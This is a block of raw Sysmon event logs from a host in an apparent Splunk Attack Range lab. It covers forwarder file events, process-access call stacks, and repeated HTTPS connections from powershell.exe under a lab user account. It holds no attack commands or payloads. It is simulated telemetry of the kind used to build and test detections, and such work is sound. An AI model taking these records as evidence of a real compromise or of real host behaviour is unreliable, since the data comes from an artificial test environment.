AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.128{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF7DC769376D501262D5864F524223E8,SHA256=5EB05E9FDB50385FF5CA66202D7C4926FB96343DFCAF6F3669FD33C249384256,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.481{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=575C432E1A0216BB72AF2D6E2B9FA080,SHA256=FD2CB15E9D6806B4CB7E97ACC700894C0C27B726DE470667A7D9072C8CC5A7A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.481{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=899B1DC9E08B77A1BDACB31884E66EBF,SHA256=582729A365BB2F97A94E1B83EB7B3EF6172FF68F5F7637641AA8A7E50E0AB47E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.181{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAC4274D042607422BA435AF2A9B7F57,SHA256=0269F16D4E2D9709C2E709E8DAD1C84E4F8E186C6B36F99FF67CF2AC757B6AD6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.128{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E42-613A-3D90-03000000C801}944C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.128{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.128{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.128{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.128{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.128{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E42-613A-3D90-03000000C801}944C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.128{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E42-613A-3D90-03000000C801}944C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.114{B81B27B7-4E42-613A-3D90-03000000C801}944C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:15.259{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0C992AC35776A5A32326C921E3BE9603,SHA256=939873F3C14922F5F24719F93FE2E207FD243AF775F7A5C0ED2C2235363BDA0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:15.212{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=437336F37948D8394B005FA7BE231E13,SHA256=3CD4591BE8FE5E6F2E8B00036D0F3B1CF4F6463FA8DBBA8862D9E92694BEC09B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:39.097{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56617-false10.0.1.12-8000- 23542300x800000000000000035084522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:16.242{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3DB0A0C4A49910B45FE5C3B3D7A3418,SHA256=842C3227F1B1916DDC399C79FCAD4AA0F9B39FF31387D2BBCF77FFB066103851,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:40.048{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56618-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:17.257{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA2426025CDBB5711261CE793DC44BA7,SHA256=4CE34873E40C1251A36950984EA4D588A65A9C961513A111D2D0BF18F46677C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:18.274{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E636F2806CC2C6201D6D0775CBA66E0,SHA256=53514069BBC71FC32638726F5F872D72DFFBBFD60ABC6F4BF753C66F07A92CB5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:19.293{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F37B145BF30EF9F01DAB98126EB8A184,SHA256=857812901A35BD643E9F54BE7CC1C55A3A5CA2EB238861BB6C96F3A6F6761A3B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:20.307{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5F6CDC940F0FF8C496C94BCB21029B6,SHA256=6225908CCBFBB60996820E534BCE56385F5967C21D1DA88FBAEFB95574543C0D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:21.337{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C439AAB940BBB2A224CC518672C8D7F,SHA256=44FDBB4FE9B7E5EA8AAFFCEDAAD836DA271FBA76BF134ED914FE228082F78B13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:21.272{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7C9710CDA45CE22CF4BA19C8A9D22143,SHA256=DFBDA3EC14E5E7EEACFEFCCB9B31D92199B21BCF52F89BA4913B475F0AA18505,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.128{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56619-false10.0.1.12-8000- 23542300x800000000000000035084531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:22.353{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D7A364E87EAB787882FE68EF1D45F6F,SHA256=31A04603A1732C5A76D3D21DF0929420B693CA69C4B492249A96A96DF0BDB664,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:46.058{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56620-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:23.370{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C1B3B7CCAAE15591ABF30A769E47E0E,SHA256=01BF60EF1AC58002C863A2338327A0CE3034D53FBB26022046B6BDC341046B2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:24.372{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D733295BBD031A262DCFC53FB80D38C6,SHA256=A3F7C4FB465BEED121455E313FA7A79EF3BE837F4AA0FC066A89ADB68E5A722E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:25.390{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2991E958D2932DA8B11E57CA6069DCF,SHA256=2D5A3726D83DCA1F32A48F4C1490CAABD078889CF535AF851115B49A5D454941,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:50.111{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56621-false10.0.1.12-8000- 23542300x800000000000000035084536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:26.406{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B357F085FD53393E68A225F753275EDE,SHA256=EC6E48A19FDB49AFECEDC6D9EDDC1DE87983F52A1E3172B1C32412B5D6334A72,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:27.437{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC76EB2B60E406798FFA471ED7E04E14,SHA256=F8262EF28202687FFA34531B1040DC8586B37F3BB49C491226745317E03BE965,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:27.090{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F10367C4F9207C802197733F7D60FAAA,SHA256=968ED1F57EF82E88475A9D5F0D3F0C4FDD3201DF5A509D33ABCC39DC8F8DD453,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.936{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E50-613A-3F90-03000000C801}3268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.936{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.936{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.936{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.936{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.936{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E50-613A-3F90-03000000C801}3268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.936{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E50-613A-3F90-03000000C801}3268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 